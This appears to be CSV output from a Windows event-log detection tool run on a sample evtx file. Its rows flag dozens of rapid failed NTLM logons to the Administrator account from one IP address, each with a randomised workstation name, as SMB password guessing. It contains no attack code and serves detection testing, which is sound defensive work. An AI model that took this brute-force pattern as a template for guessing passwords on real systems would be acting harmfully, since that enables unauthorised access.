2016-09-20 01:52:00.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rDPl1SSddrWEs979  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:00.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VrK7fENAr1lxFr9x  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:00.633 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Wu4djhEVSMYBOmjF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:00.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7e0NOdXhEkW6MskA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:00.715 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7nqxLHaOtkHHNAa1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:00.756 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NCrCf73NtEpk5DUR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:00.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YVFm1epksVGO1nFY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:00.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YmVehuMHvh5kVqRW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:00.875 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sERZrNUHsKVEShCb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:00.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eaSNgw2hvkxLnQF8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:00.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FSYOWptgxHYTDv1x  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:00.984 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Van1qwuRoWYPWrIY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:01.025 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TyLCa9OHocazZKQ2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:01.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XxrR5iUsTI9LVnLL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:01.110 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TxMREacN0QfvL51B  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:01.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7fbzSHaZBDH4zFZZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:01.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NgIei0bMIcslJCVa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:01.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JPoKjwanczELBC5A  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:01.290 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QOYMVAnCWB2RFYAk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:01.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: k1S45GBtQ8Uoyilw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:01.378 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 60oeDAnU41sz1wYg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:01.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: enjlrrdf6lrm7Bao  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:01.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 58WzO6wxh7QshZgS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:01.505 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7eZKzHgu5ADLYsWU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:01.548 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: uOSK3xC1E5PpBVNM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:01.598 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vFXasYWGCHbQOWWI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:01.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4XlYJ3oHYKYhg0KC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:01.691 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LxOKwi8Q4y2mHBDu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:01.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xwFKFySH4w2yWtPX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:01.794 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OlwGTGadOEMfUFiM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:01.836 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hZ9WuMoOtxGdwOQn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:01.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cCLK0gWvRoz0Ceao  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:01.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZDrcOxtm2fHXK5pO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:01.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Pm2tPGetcAJkSuvK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:02.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FBskiUSfF2ghuDcF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:02.050 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mZJal2nq3JAk6I2S  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:02.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Y9ek0Sl1ikhIfIb6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:02.141 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eHrn5Tp9JtnAgCbE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:02.197 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: k7tR8gp2piqqixqs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:02.245 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SqSBRMoiFeWe4FAt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:02.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Nu4m1xKDU0OUkoR0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:02.354 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gui98cdQHPgyNOZI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:02.407 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bm4U7TAfsPTEiygC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:02.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fDOoaVWVFAMLiA71  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:02.497 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qiJeLgInEkHffefo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:02.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yWyguWQP2iYUArhD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:02.595 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vDa3GqsTMMXguFhi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:02.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Lr0lkAcdnji1zjW4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:02.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4WfNFd5MkQxaxHGP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:02.741 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: j8hdPhtxP4Ds65yV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:02.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: y2BBoWoXWXuRysTx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:02.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6GEhZ2BduHwjJj9H  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:02.927 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GbwEHQCAUJd64LlA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:02.967 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wGfoObbN8ioefyce  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:03.009 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: iLHhCgHvmOzoLLqG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:03.050 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: v9KL69y47DMyFOWT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:03.098 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ECuVYiqdMw2dMjT6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:03.150 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YJCYumRekD7AREYQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:03.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0H4OxKzoemZrsosT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:03.238 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wSHnvxa0khWdWBVx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:03.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bJkPp0bghDCPYz52  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:03.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SfHRWGXjCej9HSPb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:03.383 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: X42H7EvrvzsRqXWO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:03.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: moo42NdOq30Gnz3T  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:03.475 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: A4NHVYxxDkCOsQw8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:03.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: iPUiW0vFQB405kwS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:03.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OtcZ4ymkeLHeU7YJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:03.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZxZCDKWtqkGJ0dnw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:03.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: f4GGnhttZgmRPRJo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:03.716 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gI0j9w45eXEFeex3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:03.764 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BVZ2YRDUAOsNgKxo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:03.822 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VJfIpxlcwVf7pWga  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:03.858 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Oerixd9ODF6fslsC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
